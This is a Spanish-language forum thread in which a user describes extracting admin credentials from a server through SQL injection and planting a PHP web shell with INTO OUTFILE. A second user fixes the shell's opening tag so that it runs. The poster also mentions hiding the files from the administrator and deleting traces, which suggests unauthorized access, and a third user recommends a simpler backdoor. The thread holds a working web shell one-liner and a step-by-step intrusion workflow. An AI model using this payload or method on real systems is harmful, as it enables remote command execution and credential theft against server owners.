Shell php a medias

Iniciado por 4rkn63l, 5 Marzo 2011, 18:35 PM

0 Miembros y 2 Visitantes están viendo este tema.

4rkn63l

Bueno, pues despues de venir testeando SQL Injection con una aplicacion web en X servidor, consegui sacar alguna info, el usuario y contraseña del admin, entre otras cosas.Sin embargo hay algo que no he podido testear y es una shell php, dentro del directorio web encontre un sub directorio donde tengo permiso de escritura, mediante un INTO OUTFILE escribi el codigo de la shell <? system($_REQUEST['cmd']); ?>, pero al intentar ejecutarlo no pasa absolutamente nada, y es obvio q no pase nada por que si veo el codigo fuente de archivo se muestra el codigo php, como si php no lo estuviese parseando.¿A que se debe esto?¿Es que acaso no es suficiente con que el archivo este en algun subdirectorio del arbol web?

~ Yoya ~

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

4rkn63l

Gracias ~ Yoya ~, bien explicado el uso de INTO OUTFILE.

Pero ¿A que se debera que no se ejecuta el codigo php?, es decir supongamos que el problema esta en el uso de la funcion system o por el tipo de metodo usado ($_REQUEST). Aun asi el codigo php no se deberia mostrar en el codigo fuente.

~ Yoya ~

Eso se debe a la directiva short_open_tag, trata de subir el archivo de nuevo pero asi:

Código (php) [Seleccionar]
<?php system($_REQUEST['cmd']); ?>
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

4rkn63l

si yo tambien tenia la duda que podia ser eso, el uso de las tags. Ahora veamos, tengo que subir otro archivo .php al servidor ya que INTO OUTFILE no sobreescribe ficheros, por lo que estarian alojados 2 archivos "raros" en ese subdirectorio y no quiero llamar la atencion del admin hasta terminar mis practicas xD.

Pero bueno, me voy a arriesgar a crear otro archivo esperando que el segundo funcione y a traves de la shell intentar borrar el primer archivo.....se puede no??  :xD

~ Yoya ~

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

4rkn63l

Bingo!!  ::)

Muchas gracias ~ Yoya ~ por tu ayuda,la verdad no pensé que el modo de las etiquetas pudiera afectar, leí una info donde efectivamente dice que en php5 no vienen habilitadas las etiquetas cortas que es lo que me hacias mencion anteriormente...pero bueno de los errores se aprende.

Ademas pude borrar el primer archivo sin problemas jejeje.

not-all0w3d

¿Por qué no sólo usaste una backdoor sencilla?..
En fin el problema está solucionado, sólo era una sugerencia.